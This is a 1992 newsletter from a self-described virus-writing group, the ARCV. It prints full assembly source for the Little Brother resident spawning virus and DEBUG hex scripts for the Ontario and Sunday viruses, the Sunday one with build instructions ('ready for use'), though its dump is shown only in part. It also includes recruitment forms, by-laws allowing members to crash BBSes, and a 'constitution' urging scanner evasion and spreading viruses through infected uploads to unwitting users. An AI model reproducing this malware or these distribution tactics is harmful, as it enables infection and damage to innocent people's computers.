Copy Link
Add to Bookmark
Report
The Association of Really Cruel Viruses 001
The
ÜÜ ÜÜÜ ÜÜÜ Ü Ü
ÛÜÜÛ ÛÜÜÛ Û Û Û
Û Û þ Û ßÜ þ ÛÜÜ þ ßÜÜß þ
ÚÄÄÄThe Association of Really Cruel Viruses.ÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Welcome to the first ARCV Newsletter....
We hope you are all having a Spiffing Time out there....
First lets introduce the 'Team'.
The Keyboard Basher - Apache Warrior.
The Other One - ICE-9.
Well you may or may not know that we here are one the only Truly
English Computer Underground Organisation (And just to piss off the
Americans Out there we will spell everything with an 's' not a 'z').
In this and future newsletters we will be dodging Special Branch and
New Scotland Yard as we go, as well as putting in the odd virus ASM
file, Debug Dump for you all to have fun with. We will also provide
information on what's happening (DUDE) out there in Computer Land.
Contents.
000..........................................................Contents.
001...................................Virus Spotlight, Little Brother.
002............................................ARCV Application Forms.
003.........................What is The ARCV, and Who are its Members.
004.....................................................Ontario Virus.
005......................................................Sunday Virus.
006...........................................................Closing.
The file in the Archive ARCVVIR.COM is a self displaying List of all
the ARCV Viruses we have produced. (Requires ANSI.SYS)
Greetings...To
The Guy Who Wrote CHAOS - Thanks Bud
The Guy Who Wrote FU MANCHU - Are you English?
Patti 'VSUM' Hoffman - We are here to make your Life HELL!
John McAfee - To Think if wasn't for us you'd be Unemployed
The Guy Who Wrote MICHELANGELO - Geta LIFE!!!!!!!!!!!!!
Terry Pratchett - You Are COOOOOOOOL!
And Are Carnivorous Plants Really that Boring?
ARCV NEWS 001.
- Virus Spotlight -
Little Brother.
Now this virus, is rather crafty as is relies on good old MSDOS
program handling to work, ie. The Fact that .COM files are allways load
before .EXE files. First lets see what Patti has to say.
Virus Name: Little Brother
Aliases:
V Status: Rare
Discovered: October, 1991
Symptoms: 307 byte .COM files
Origin: The Netherlands
Eff Length: 307 Bytes
Type Code: SRCE - Spawning Resident .EXE Infector
Detection Method: ViruScan, AVTK 5.54+, F-Prot 2.03+, Novi 1.1d+
Removal Instructions: Delete infected .COM programs
General Comments:
The Little Brother virus was submitted from the Netherlands in
October, 1991. This virus is a spawning virus similar in technique to the
Aids 2 and Twin-351 viruses.
The first time a program infected with Little Brother is executed,
Little Brother will become memory resident in a "hole" in low system memory
in the system data area, hooking interrupt 21. There will be no change in
total system or available free memory.
Once resident, the Little Brother virus will infect .EXE programs when
they are executed. The .EXE program itself will not be altered, but a
corresponding .COM program will be created by the virus of 307 bytes. This
corresponding.COM program will contain pure virus code and have a date/time
stamp in the DOS directory of when it was created. The following text
strings can be found in the 307 byte .COM files:
"Little Brother"
"EXE COM"
Since DOS will execute .COM programs before .EXE programs, whenever
the user attempts to execute a .EXE program, the corresponding .COM program
will be executed first. The .COM program, when finished will then start
the .EXE program the user was attempting to execute.
Well lets get to the Asm source.
---------------------------------------------------------------------------
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
FILELEN equ quit - begin
RESPAR equ (FILELEN/16) + 17
VER_ION equ 1
oi21 equ quit
nameptr equ quit+4
DTA equ quit+8
.RADIX 16
;**************************************************************************
;* Start the program!
;**************************************************************************
begin: cld
mov ax,0DEDEh ;already installed?
int 21h
cmp ah,041h
je cancel
mov ax,0044h ;move program to empty hole
mov es,ax
mov di,0100h
mov si,di
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,0084h
mov di,offset oi21
movsw
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21
mov ax,2521h
int 21h
cancel: ret
;**************************************************************************
;* File-extensions
;**************************************************************************
EXE_txt db 'EXE',0
COM_txt db 'COM',0
;**************************************************************************
;* Interupt handler 24
;**************************************************************************
ni24: mov al,03
iret
;**************************************************************************
;* Interupt handler 21
;**************************************************************************
ni21: pushf
cmp ax,0DEDEh ;install-check ?
je do_DEDE
push dx
push bx
push ax
push ds
push es
cmp ax,4B00h ;execute ?
jne exit
doit: call infect
exit: pop es
pop ds
pop ax
pop bx
pop dx
popf
jmp dword ptr cs:[oi21] ;call to old int-handler
do_DEDE: mov ax,04100h+VER_ION ;return a signature
popf
iret
;**************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;**************************************************************************
infect: cld
mov word ptr cs:[nameptr],dx ;save the ptr to the
;filename
mov word ptr cs:[nameptr+2],ds
push cs ;set new DTA
pop ds
mov dx,offset DTA
mov ah,1Ah
int 21
call searchpoint
mov si,offset EXE_txt ;is extension 'EXE'?
mov cx,3
rep cmpsb
jnz do_com
do_exe: mov si,offset COM_txt ;change extension to COM
call change_ext
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
push cs ;set int24 vec to new handler
pop ds
mov dx,offset ni24
mov ax,2524h
int 21
lds dx,dword ptr [nameptr] ;create the file (unique
;name)
xor cx,cx
mov ah,5Bh
int 21
jc return1
xchg bx,ax ;save handle
push cs
pop ds
mov cx,FILELEN ;write the file
mov dx,offset begin
mov ah,40h
int 21
cmp ax,cx
pushf
mov ah,3Eh ;close the file
int 21
popf
jz return1 ;all bytes written?
lds dx,dword ptr [nameptr] ;delete the file
mov ah,41h
int 21
return1: pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
mov si,offset EXE_txt ;change extension to EXE
call change_ext
return: ret
do_com: call findfirst ;is the file a virus?
cmp word ptr cs:[DTA+1Ah],FILELEN
jne return
mov si,offset EXE_txt ;does the EXE-variant
exist?
call change_ext
call findfirst
jnc return
mov si,offset COM_txt ;change extension to COM
jmp short change_ext
;**************************************************************************
;* Find the file
;**************************************************************************
findfirst: lds dx,dword ptr [nameptr]
mov cl,27h
mov ah,4Eh
int 21
ret
;**************************************************************************
;* change the extension of the filename (CS:SI -> ext)
;**************************************************************************
change_ext: call searchpoint
push cs
pop ds
movsw
movsw
ret
;**************************************************************************
;* search begin of extension
;**************************************************************************
searchpoint: les di,dword ptr cs:[nameptr]
mov ch,0FFh
mov al,'.'
repnz scasb
ret
;**************************************************************************
;* Text and Signature
;**************************************************************************
db 'Little Brother',0
quit:
cseg ends
end begin
Quite a Simple idea for a virus but it works.
Apche.ARCV NEWS 002.
Well I thought it could be a good idea if I put in the relevant ARCV
Application forms for any one who may wish to join the ranks of the ARCV.
At the moment we are looking for MAC Virus programmers, and AMIGA Virus
Programmers and others. Also we are looking Couriers for the ARCV (BBS's
for Distribution), that are based all over the world in Britain, USA and
Eastern Europe Mainly but other countries will get equal consideration. so
less of the waffle and to the Applications.
---------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/////// //////// ///////// // //
// // // // // // //
/////// /////// // // //
// // // // // // //
// // * // // * ///////// * ///
THE
ASSOCIATION
OF REALLY
CRUEL
VIRUSES
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Association of Really Cruel Viruses
Courier and/or Membership Application Form
For any purpose other than to evaluate this application, the data in all
sections of this application shall not be disclosed outside the internal
leadership of the ARCV. For more ARCV information please see ARCV
prologue.
---------------------------------------------------------------------------
FALSE STATEMENT: A person is guilty of False Statement when he/she
Intentionally makes a false statement under oath or
pursuant to a form bearing Notice.
You are here to fore-warned...
FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!
---------------------------------------------------------------------------
PART A: Background Information
1. Date of Application:__________________________________
2. Applicants Name (Last,First,Middle,Maiden):
______________________________________________________
3. Applicants Current Handle:____________________________
4. List all other Handles by which you have been known.
______________________________________________________
______________________________________________________
5. Residence Address (Number,Street,City or Town,County and Post Code):
_______________________________________________________
_______________________________________________________
_______________________________________________________
6. Home Telephone Number (Area Code and Number):
_______________________________________________________
7. Home Data Number (Area Code and Number):
_______________________________________________________
8. Fidonet Contact address (full address, including name to contact):
_______________________________________________________
_______________________________________________________
9. Age:__________ Date of Birth:_________________________
10. Marital Status: ___ Married ___ Separated
___ Single ___ Divorced
11. Nationality __________________________________________
12. Have you at any time used a virus? YES/NO ____________
If Yes, explain: _____________________________________
______________________________________________________
______________________________________________________
13. Have you at any time been the victim of a virus attack?
YES/NO _________________
If yes, explain: _____________________________________
______________________________________________________
______________________________________________________
Part B: Legal Information
1. Have You ever been convicted in any court of a crime
punishable by imprisonment for a term exceeding 1 year?
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
2. Are you currently on Probation,Parole,a Work-Release Program
or Released on Personal Recognizance or Bond Pending Court Action?
No _____
Yes ____ If yes, explain: ______________________________
_______________________________________________________
_______________________________________________________
3. Are you Now or ever have been a member of any form of
Law Enforcement Agency, Such as: FBI,Secret Service,NSA,
CIA,BATF,State or Local Police,Special Branch etc.?
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
4. Are you Now or ever have been a member of any form of
group that investigates the Computer Underground?
Such as: Software Publishers Association,etc.
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
5. Do you belong To any Organized Computer Club or Group?
No _____
Yes ____ If yes, explain: _____________________________
_______________________________________________________
_______________________________________________________
Part C: ARCV Information
1. Are you applying to be:
An ARCV Member __________
An ARCV Courier __________
Both __________
2. If applying to be a member, Explain in detail your reason for wanting
to be a member of the ARCV.
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
3. What kind of position do you wish to hold in the ARCV?
____________________________________________________________________
____________________________________________________________________
____________________________________________________________________
Part D: Qualifications
1. Which Programming languages do you know WELL? (Place X in Boxes)
[ ] Assembler
[ ] Basic
[ ] Cobol
[ ] C (Turbo, Ansi)
[ ] Fortran
[ ] Pascal (Turbo, Others)
2. Which Programming languages are you familiar which (Place x in Boxes)
[ ] Assembler
[ ] Basic
[ ] Cobol
[ ] C (Turbo, Ansi)
[ ] Fortran
[ ] Pascal (Turbo, Others)
3. Have you ever written a virus? (No Trojans Please)
No _______
Yes ______ If yes, explain: ___________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
4. If you answered NO to the above DON'T answer this...
Has the virus you've written in the Public Domain?
(ie. Is it released?)
No _______
Yes ______ If yes, explain: ___________________________
_______________________________________________________
_______________________________________________________
_______________________________________________________
5. If you've written a virus are you willing for it to be placed in our
virus library?
No _______
Yes ______
6. Do you have a virus collection?
No _______
Yes ______ If yes, explain (Please included number in collection)
_______________________________________________________
_______________________________________________________
_______________________________________________________
________________________________________________________
ARCV By-Laws:
---------------------------------------------------------------------------
Section 1A-1
ALL MEMBERS OF THE ARCV MUST SUBSCRIBE TO THE HACKERS ETHIC AS DEFINED
BY THE EARLY CRAFTERS OF THE ART. (See Appendix A) ALSO YOU MUST SUBSCRIBE
TO THE VIRUS WRITERS CONSTITUTION. (See Appendix B)
---------------------------------------------------------------------------
Section 1a-2
DEFENSE OF COPARTICIPANTS IN OFFENSE WITH A COMPUTER
In any prosecution for any Crime under Law, in which the member was not
the only participant, it shall be recognized that no ARCV
member shall provide information on any current ARCV member to any
member of the Media or Law Enforcement Agencies.
---------------------------------------------------------------------------
Section 1a-3
USE OF DEADLY HACKING FORCE
Except as provided in these sub-sections, No ARCV member shall ever damage
delete or in any way tamper with a computer network or system.
Exception 1a-3-1 : Any BBS or system posting or providing Anti-ARCV
propaganda may be crashed or deleted.
Exception 1a-3-2 : Any BBS or system posting or providing any ARCV members
phone numbers,Password, or personal information may be
crashed or deleted.
Exception 1a-3-3 : Any system so approved by the ARCV Council.
---------------------------------------------------------------------------
Section 1a-4
DISCLOSURE OF PROPRIETARY INFORMATION
No ARCV member shall distribute confidential ARCV information.
This shall include: Disks,Programs,Files,Passwords or Codes,Paperwork,
Manuals,Documents to any Non ARCV member,Media Member, or Law Enforcement
Agency, Without the prior permission of the ARCV Council.
---------------------------------------------------------------------------
Section 1a-5
CONTRIBUTION OF INFORMATION
All ARCV Members are expected to contribute to the ARCV as a whole, and
to provide information obtained on their own. Members shall not just
use information provided by other members or non-members.
---------------------------------------------------------------------------
Section 1a-6
DISCLOSURE OF MEMBERSHIP
All ARCV members will not allow any Non-member to use his/her password,
ID,Handle or name. And No member shall post or provide any members name
password or phone number on any computer system without the prior consent
of said member. All members will leave his/her name or phone number on a
system or network at their own discretion and risk.
---------------------------------------------------------------------------
APPENDIX A:
1. All Information should be FREE!
2. Promote Decentralization - Mistrust Authority
3. Access to computers should be unlimited and Total
4. Hackers should be judged by their hacking ability
5. You can create art and beauty on a computer
6. Computers can change your life for the better.
___________________________________________________________________________
APPENDIX B: ***
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The Constitution of Worldwide Virus Writers
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Initial Release - February 12, 1992
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ARTICLE I - REGARDING ORIGINAL VIRII
Section A - DEFINITION
The term "original virus" herein indicates programming done
exclusively by either one individual or group, with no code
taken from any other source, be it a book or another virus.
Section B - CODE REQUIREMENTS
For an original virus to conform to the standards set by
this document, it must include the following:
1) The title of the virus in square brackets followed by a
zero byte should be in the code, in a form suitable for
inclusion into SCAN(1). This is to ensure that the
name of the virus is known to those examining it.
2) The name of the author and his/her group affiliation/s
should be included in the code, followed by a zero
byte. At the present, this is an optional requirement.
3) Some form of encryption or other form of stealth
techniques must be used. Even a simple XOR routine
will suffice.
4) If the virus infects files, the code should be able to
handle infection of read only files.
5) It must have some feature to distinguish it from other
virii. Creativity is encouraged above all else.
6) The virus must not be detectable by SCAN.
Section C - IMPLEMENTATION
This section, and all sections hereafter bearing the heading
"IMPLEMENTATION" refer to the recommended method of
implementation of the suggestions/requirements listed in the
current article.
1) Virus_Name db '[Avocado]',0
2) Author db 'Dark Angel, PHALCON/SKISM',0
ARTICLE II - REGARDING "HACKED" VIRII
Section A - DEFINITION
The term "hacked virus" herein refers to any virus written
by either one individual or a group which includes code
taken from any other source, be it a book, a code fragment,
or the entire source code from another virus.
The term "source virus" herein refers to the virus which
spawned the "hacked virus."
Section B - CODE REQUIREMENTS
For a "hacked" virus to conform to the standards set forth
by this document, it must include the following, in addition
to all the requirements set down in Article I of this
document:
1) The title, author (if available), and affiliation of
the author (if available) of the original virus.
2) The author of the hacked virus must give the source
code of said virus to the author of the source virus
upon demand.
3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
Avenger hacks are to be written.
4) The source virus must be improved in some manner
(generally in efficiency of speed or size).
5) The hacked virus must significantly differ from the
source virus, i.e. it cannot be simply a text change.
Section C - IMPLEMENTATION
1) Credit db 'Source stolen from Avocado by Dark Angel of
PHALCON/SKISM',0
ARTICLE III - REGARDING VIRAL STRAINS
Section A - DEFINITION
The term "viral strain" herein refers to any virus written
by the original author which does not significantly differ
from the original. It generally implies a shrinking in code
size, although this is not required.
Section B - CODE REQUIREMENTS
For a "viral strain" to conform to the standards set by this
document, it must include the following, in addition to all
the requirements set down in Article I of this document:
1) The name of the virus shall be denoted by the name of
the original virus followed by a dash and the version
letter.
2) The name of the virus must not change from that of the
original strain.
3) A maximum of two strains of the virus can be written.
Section C - IMPLEMENTATION
1) Virus_Name db '[Avocado-B]',0
ARTICLE IV - DISTRIBUTION
Section A - DEFINITION
The term "distribution" herein refers to the transport of
the virus through an infected file to the medium of storage
of a third (unwitting) party.
Section B - INFECTION MEDIUM
The distributor shall infect a file with the virus before
uploading. Suggested files include:
1) Newly released utility programs.
2) "Hacked" versions of popular anti-viral software, i.e.
the version number should be changed, but little else.
3) Beta versions of any program.
The infected file, which must actually do something useful,
will then be uploaded to a board. The following boards are
fair game:
1) PD Boards
2) Lamer boards
3) Boards where the sysop is a dick
No virus shall ever be uploaded, especially by the author,
directly to an antivirus board, such as HomeBase or
Excalibur.
Section C - BINARY AND SOURCE CODE AVAILABILITY
The binary of the virus shall not be made available until at
least two weeks after the initial (illicit) distribution of
the virus. Further, the source code, which need not be made
available, cannot be released until the latest version of
SCAN detects the virus. The source code, should it be made
available, should be written in English.
Section D - DOCUMENTATION
Documentation can be included with the archive containing
the binary of the virus, although this is optional. The
author should include information about the virus suitable
for inclusion in the header of VSUM(2). A simple
description will follow, though the author need not reveal
any "hidden features" of the virus. Note this serves two
purposes:
1) Enable others to effectively spread the virus without
fear of self-infection.
2) Ensure that your virus gets a proper listing in VSUM.
ARTICLE V - AMENDMENTS
Section A - PROCEDURE
To propose an amendment, you must first contact a
PHALCON/SKISM member through one of our member boards.
Leave a message to one of us explaining the proposed change.
It will then be considered for inclusion. A new copy of the
Constitution will then be drafted and placed on member
boards under the filename "PS-CONST.TXT" available for free
download by all virus writers. Additionally, an updated
version of the constitution will be published periodically
in our newsletter.
Section B - AMENDMENTS
None as of this writing.
ARTICLE VI - MISCELLANEOUS
Section A - WHO YOU CAN MAKE FUN OF
This is a list of people who, over the past few years, have
proved themselves to be inept and open to ridicule.
1) Ross M. Greenberg, author of FluShot+
2) Patricia (What's VSUM?) Hoffman.
2) People who post "I am infected by Jerusalem, what do I
do?" or "I have 20 virii, let's trade!"
3) People who don't know the difference between a virus
and a trojan.
4) Lamers and "microwares puppies"
Section B - WHO YOU SHOULDN'T DIS TOO BADLY
This is a list of people who, over the past few years, have
proved themselves to be somewhat less inept and open to
ridicule than most.
1) John McAfee, nonauthor of SCAN
2) Dennis, true author of SCAN
Section C - MOTIVATION
In most cases, the motivation for writing a virus should not
be the pleasure of seeing someone else's system trashed, but
to test one's programming abilities.
ÄÄÄÄÄÄÄÄÄÄ
1 SCAN is a registered trademark of McAfee Associates.
2 VSUM is a registered trademark of that bitch who doesn't know her own
name.
___________________________________________________________________________
For those applying for courier membership if we feel you are suitable we
will be in touch to discus the extra details. The usual first contact
will be by means of a Fidonet address or a written letter.
For those applying for normal membership then will contact you at your
Fidonet address, with the extra details of the membership and a list of
board that's we can be contacted through.
___________________________________________________________________________
FALSE STATEMENT: A person is guilty of False Statement when he/she
Intentionally makes a false statement under oath or
pursuant to a form bearing Notice.
You are here to fore-warned...
FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!
I agree to the By-Laws and statements put forth on this document
NAME: _______________________________
DATE: _______________________________
To return your Application please return to Apache Warrior. Through E-
Mail on any Flashback BBS or the BBS where you got this from.
Please fill in the Machine Configuration data sheet and return to the
above address.
***
PS. Thanks to PHALCON/SKISM for preparing the Virus Writers Constitution.
***
---------------------------------------------------------------------------
The ARCV'92
May the Great A'Tuin keep going........
---------------------------------------------------------------------------
Well that's the Application form next is the machine spec. form. This
gives us an indication of the kind of computer system you run.
---------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/////// //////// ///////// // //
// // // // // // //
/////// /////// // // //
// // // // // // //
// // * // // * ///////// * ///
THE
ASSOCIATION
OF REALLY
CRUEL
VIRUSES
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The Association of Really Cruel Viruses.
Machine Configuration Form.
Please fill in all the questions truthfully as they will help us decide
what you can offer our group.
___________________________________________________________________________
1. Date of Application:__________________________________
2. Applicants Name (Last,First,Middle,Maiden):
______________________________________________________
3. Applicants Current Handle:____________________________
4. Machine Type. (Place an X in the boxes appropriate)
[ ] IBM PC.
[ ] AMIGA.
[ ] ATARI ST.
[ ] MAC.
[ ] ARCHIMEDES.
[ ] OTHER, (Please State).
5. If you answered IBM PC to the above please answer below. What type
of IBM PC do you have.
[ ] 8086/88 Based
[ ] 80286 Based
[ ] 80386 (SX/DX) Based
[ ] 80486 (SX/DX/DX2) Based
[ ] PS/2
6. If you have a machine other than that of an IBM PC please state
processor type and manufacturer.
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
7. Do you have any of the following equipment.
[ ] Hard Disk, enter size and type: ______________________________
______________________________________________________________
[ ] Modem, enter model and max speed: ____________________________
______________________________________________________________
[ ] Printer
[ ] 9 pin Dot Matrix
[ ] 24 pin Dot Matrix
[ ] Laser Printer
[ ] Ink Jet type
[ ] Colour
[ ] Monochrome Display.
[ ] CGA Display, or equivalent.
[ ] EGA Display, or equivalent.
[ ] VGA Display, or equivalent.
[ ] SVGA Display, or equivalent.
[ ] 5¬ inch 360K floppy.
[ ] 5¬ inch 1.2Mb floppy.
[ ] 3« inch 720Kb floppy.
[ ] 3« inch 1.44Mb floppy.
[ ] Other Please State: __________________________________________
8. What Kind of Anti-Virus Software do you use:
_______________________________________________________________
_______________________________________________________________
9. Do you believe in Virus Research? YES/NO _______________________
10. Do you Hack? YES/NO ___________________________________________
11. If so what kind of Systems? ___________________________________
_______________________________________________________________
12. Do you run a BBS? YES/NO ______________________________________
13. If so please state BBS configuration. inc. Software, Machines.
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
14. If you have a BBS are you willing for us to us it? YES/NO _____
___________________________________________________________________________
This all for now and we may ask further questions regarding your computer
setups. Thank you for your time.
___________________________________________________________________________
FALSE STATEMENT: A person is guilty of False Statement when he/she
Intentionally makes a false statement under oath or
pursuant to a form bearing Notice.
You are here to fore-warned...
FALSE STATEMENTS SHALL NOT BE MADE ON THIS FORM!!!
I agree to the statements put forth on this document
NAME: _______________________________
DATE: _______________________________
To return your Machine Configuration data sheet please return to Apache
Warrior. Through E-Mail on any Flashback BBS or the BBS where you got this
from.
---------------------------------------------------------------------------
The ARCV'92
Octarine - The Pigment of Imagination......
---------------------------------------------------------------------------ARCV NEWS 003.
The Association of Really Cruel Viruses.
This is one of the first English Computer Underground groups, although
we are an English organisation we can only be contacted through American or
Eastern Europe Virus boards. Or we will contact through a Fidonet address.
What is The ARCV.
ARCV is a organisation that is involved in Writing and Research of
computer viruses. We hold a Library of IBM Computer viruses for the use of
the ARCV members. But as a group we are involved in viruses for most the
main computer types (IBM PC, AMIGA, ST, MAC). We have a Bi-Monthly
newsletter with the latest virus news from around the country and from
around the world, virus Dis-Assemblies and other virus Debug Scripts. We
have links with PHALCON/SKISM in the US, we also have links with some
Eastern Europe Virus writers. Are group is not only limited to virus
activities but other 'Underground' activities also (Hacking, Phreaking
etc.) so any new members who don't write viruses could be involved in any
of the other activities we are involved in.
Are members come from the youths of today, at the moment we are mainly
English students that wish to beat and know more about the system. We come
from a range of backgrounds from the Electronics side and the Computer
side, I myself Apache Warrior come mainly from the Electronics side but
branched to the Computer side fully around 2 years ago. I Hack, Phreak and
write Viruses, I am the President of the group (after all I started the
group) and I am some what of an expert on beating the BT phone exchange and
being a BBS A HOLIC that comes in very handy. Now ICE-9 is also a
Electronics guy who turned to the computer he writes viruses and is into
Heavy Metal. Now the picture put out by the Anti-Virus Authors is that
Virus writers are Sad individuals who wear Anoraks and go Train Spotting
but well they are sadly mistaken, we are very intelligent, sound minded,
highly trained, and we wouldn't be seen in an Anorak or near an Anorak even
if dead.
We aim to provide the ARCV members and some Non-Members an insight to
the computer underground world and would you believe it is huge. The Group
is always seeking new members and we require new members to stay afloat,
soon we will be opening the world HQ in the UK this will have special
access areas for the ARCV members these will include access to the ARCV
Virus Library, all of which are legit viruses and No Trojans.ARCV NEWS 004.
The Ontario Virus
Well heres a virus from Canada.
V Status: Rare
Discovered: July, 1990
Symptoms: .COM & .EXE growth; decrease in system and free memory;
hard disk errors in the case of extreme infections
Origin: Ontario, Canada
Eff Length: 512 Bytes
Type Code: PRtAK - Parasitic Encrypted Resident .COM & .EXE Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, NAV
Removal Instructions: SCAN /D, or Delete infected files
General Comments:
The Ontario Virus was isolated by Mike Shields in Ontario, Canada in
July, 1990. The Ontario virus is a memory resident infector of .COM,
.EXE, and overlay files. It will infect COMMAND.COM.
The first time a program infected with the Ontario Virus is executed,
it will install itself memory resident above the top of system memory
but below the 640K DOS boundary. Total system memory and free memory
will be decreased by 2,048 bytes. At this time, the virus will infect
COMMAND.COM on the C: drive, increasing its length by 512 bytes.
Each time an uninfected program is executed on the system with the
virus memory resident, the program will become infected with the viral
code located at the end of the file. For .COM files, they will
increase by 512 bytes in all cases. For .EXE and overlay files, the
file length increase will be 512 - 1023 bytes. The difference in
length for .EXE and overlay files is because the virus will fill out
the unused space at the end of the last sector of the uninfected file
with random data (usually a portion of the directory) and then append
itself to the end of the file at the next sector. Systems using a
sector size of more than 512 bytes may notice larger file increases
for infected files. Infected files will always have a file length
that is a multiple of the sector size on the disk.
In the case of extreme infections of the Ontario Virus, hard disk
errors may be noticed.
Ontario uses a complex encryption routine, and a simple identification
string will not identify this virus.
---------------------------------------------------------------------------
n ontario.com
e 0100 E9 1D 00 1D 66 65 63 74 65 64 20 50 72 6F 67 72
e 0110 61 6D 2E 20 0D 0A 24 BA 02 01 B4 09 CD 21 CD 20
e 0120 90 E8 E9 01 93 84 7B D9 F8 69 7C 3C 84 7B B6 A5
e 0130 71 60 0F CB 65 B7 BB 0A A3 07 55 97 7F 86 BE 9A
e 0140 FF 84 55 0D E5 84 79 AA F7 1A 79 86 F7 47 30 0A
e 0150 A0 05 55 87 7B 04 7B 25 69 84 56 04 7B 27 69 84
e 0160 F5 44 75 9B F0 71 48 7B C2 80 79 78 88 20 F5 5D
e 0170 81 43 7D 00 7B FB 7B 27 FD 84 80 3C 84 CF B6 A5
e 0180 64 9A 7C 8F 96 F0 77 09 CD FF 7B 3B 7B 85 2C 78
e 0190 DE 21 B8 08 BB AA 7A 82 06 84 91 6F 6E CD 15 B9
e 01A0 84 7B 0E 86 3B 4B FB 78 30 F1 6F B8 78 F0 6B B8
e 01B0 84 F1 72 8A 64 3E A6 85 93 8D 7B 4B 93 81 7B AA
e 01C0 84 AA 7B 86 7D 9A 29 D5 28 D4 C3 84 38 6C 5D 85
e 01D0 09 9C 8D 45 7A F0 70 04 9A 7A C3 85 38 6C 6D 85
e 01E0 09 8C C3 86 46 6C 75 85 08 87 92 86 7A 0F A3 8A
e 01F0 64 3C 7B D3 93 7B 7B 0D 75 80 79 0D 6D 82 79 3E
e 0200 73 86 C2 9F 7B 30 44 6C 97 84 09 CC FA BA 73 86
e 0210 36 DE 0F BD DB 8D 79 BE 7D 8F 79 F0 4C B7 A9 B7
e 0220 B2 3C 79 C6 93 4B 7B F6 50 B9 7B 64 0C A2 2B 25
e 0230 73 86 D8 FF 7B 25 71 86 D8 F9 7B DC 56 87 7B 42
e 0240 7D 8C 79 6D D8 8D 79 26 70 86 90 CD EB 07 45 98
e 0250 79 85 0E 87 92 01 7B 25 77 86 C2 84 79 73 9A D4
e 0260 29 35 7F 57 B1 57 93 87 B9 AF 7D 94 79 D4 DA 98
e 0270 79 27 00 84 DA 9A 79 81 6B 84 D8 F9 7B DC D8 9A
e 0280 79 43 7D 98 79 85 7B 7B 7D 88 79 DD 21 3C 7B C6
e 0290 93 E7 7B F6 3C 04 4D 7C 7A 8C 48 44 F5 5C DB E8
e 02A0 7F 8A 64 8A 7C 26 97 85 48 72 C4 A0 79 D3 C2 84
e 02B0 79 78 88 20 C5 AC 79 6C 21 84 21 3D 7B 86 CF C4
e 02C0 93 B7 7B F6 6C B7 B2 B7 A9 3C 7B C6 93 A3 7B F6
e 02D0 70 3E 73 86 C2 9F 7B 30 3B 6C 61 84 F0 92 7D 86
e 02E0 F0 8A 7F 86 C3 85 2C 6C 77 84 CF BA 93 83 7B DC
e 02F0 20 DD 21 9B 7C 47 E7 AA 84 9A 7B 86 B8 C7 41 D8
e 0300 38 CB 36 C9 3A CA 3F AA 38 CB 36 84 84 5E 56 2E
e 0310 8A 84 E8 01 B9 E8 01 F6 D0 2E 30 04 46 E2 F8 C3
rcx
220
w
q
---------------------------------------------------------------------------
Apche..
ARCV NEWS 005.
The Sunday Virus
According to Patty Hoffman, the Sunday virus is based on the Jerusalem
viruses, because the codes for both viruses are similar. Sunday infects
COM, EXE, and OVL files, when they are executed, and it stays resident in
memory. It was circulated around the Seattle, Washington area in 1989, and
is very common.
How ever this version of Sunday doesn't seem to print any messages on
the screen, like some of the other versions do, every Sunday. This virus
spreads rapidly, and is a great replicator.
To create SUNDAY.COM, cut out the following code, and name the
resulting file sunday.scr. Then, use this command: DEBUG < SUNDAY.SCR
this will then produce the .COM all ready for use.
---------------------------------------------------------------------------
n sunday.com
e 0100 E9 92 00 59 57 C8 F7 E1 EE E7 00 01 4C 1E 00 00
e 0110 00 02 00 AB 00 0C 13 16 17 C7 02 BF 05 3A 1E 63
e 0120 79 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
e 0130 5F BD 1D 80 00 00 00 80 00 BD 1D 5C 00 BD 1D 6C
e 0140 00 BD 1D 00 0A 95 22 29 00 00 00 00 F0 02 00 4D
e 0150 5A 87 01 14 01 ED 05 80 01 23 0B FF FF 8C 20 C0
e 0160 06 89 19 C6 00 8C 20 1E 00 00 00 00 00 00 00 00
e 0170 05 00 20 00 29 15 01 79 00 02 10 00 C0 20 02 00
